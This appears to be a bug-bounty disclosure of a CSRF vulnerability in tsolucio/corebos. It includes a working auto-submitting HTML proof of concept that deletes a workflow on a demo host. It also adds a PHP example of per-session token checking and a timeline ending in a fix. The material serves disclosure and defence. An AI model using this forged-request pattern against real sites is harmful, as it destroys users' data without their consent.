Cross-Site Request Forgery (CSRF) in tsolucio/corebos

Valid

Reported on Oct 18th 2021


Description

Hey Corebos team

An attacker is able to delete a workflow, as there isn't any CSRF token for it.

//PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://demo.corebos.com/index.php">
      <input type="hidden" name="module" value="com&#95;vtiger&#95;workflow" />
      <input type="hidden" name="action" value="deleteworkflow" />
      <input type="hidden" name="workflow&#95;id" value="27" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

After you open the PoC.html file, the workflow with id equal to 27 will be deleted.
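The missing control described in this report, shown as an added example that is not part of the original report and is not the corebos fix: a per-session token check that rejects the PoC's request shape. The helper names `csrf_token()` and `csrf_check()` and the `csrf_token` form field are hypothetical; the module, action and `workflow_id` parameters are taken from the PoC.

```php
<?php
declare(strict_types=1);
// Added example: hypothetical helper names, not corebos code.

// Issue (or reuse) a per-session random token, to be embedded in every
// form that changes state as a hidden field.
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Decide whether a state-changing request may proceed.
function csrf_check(string $method, array $post, array $session): bool
{
    // Destructive actions must not be reachable by GET: a cross-site form
    // submits with the victim's session cookie attached.
    if (strtoupper($method) !== 'POST') {
        return false;
    }
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    // Reject missing tokens and non-string input such as csrf_token[]=x.
    if (!is_string($expected) || !is_string($supplied) || $expected === '') {
        return false;
    }
    // Constant-time comparison of the session token and the submitted one.
    return hash_equals($expected, $supplied);
}

// Constructed requests for demonstration.
$session = [];
$token = csrf_token($session);

$forged = [
    'module'      => 'com_vtiger_workflow',
    'action'      => 'deleteworkflow',
    'workflow_id' => '27',
];
$legit = $forged + ['csrf_token' => $token];

var_dump(csrf_check('GET', $forged, $session));  // request shape from the PoC
var_dump(csrf_check('POST', $forged, $session)); // POST, still without a token
var_dump(csrf_check('POST', $legit, $session));  // POST carrying the session token
```

In a real handler the check runs before the delete is dispatched, with `$_SERVER['REQUEST_METHOD']`, `$_POST` and `$_SESSION` passed in.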

We have contacted a member of the tsolucio/corebos team and are waiting to hear back 2 years ago
We have sent a follow up to the tsolucio/corebos team. We will try again in 7 days. 2 years ago
We have sent a second follow up to the tsolucio/corebos team. We will try again in 10 days. 2 years ago
Joe Bordes validated this vulnerability 2 years ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
Joe Bordes marked this as fixed with commit 40e22c 2 years ago
Joe Bordes has been awarded the fix bounty
This vulnerability will not receive a CVE